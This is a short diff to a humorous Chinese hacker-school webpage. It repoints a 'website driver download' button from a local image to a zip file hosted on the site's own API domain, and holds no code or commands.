--- a/html/index.html
+++ b/html/index.html
@@ -213,7 +213,7 @@
             <h3>抽象的兴趣导向教材</h3>
             <p>我们的网安学校教材以抽象著称<br />完全摈弃传统学习</p>
           </div>
-          <div align="center" class="div-button" onclick="window.location.href='./img/5602d880826fda0d7c93529b79dc3ec8.jpg'">
+          <div align="center" class="div-button" onclick="window.location.href='https://api.hackerstack.top/resource/hackerstack_driver.zip'">
             <h3>网站驱动程序下载</h3>
             <p>可以执行更多更加离谱的黑客功能<br />适用于Windows,Linux</p>
           </div>
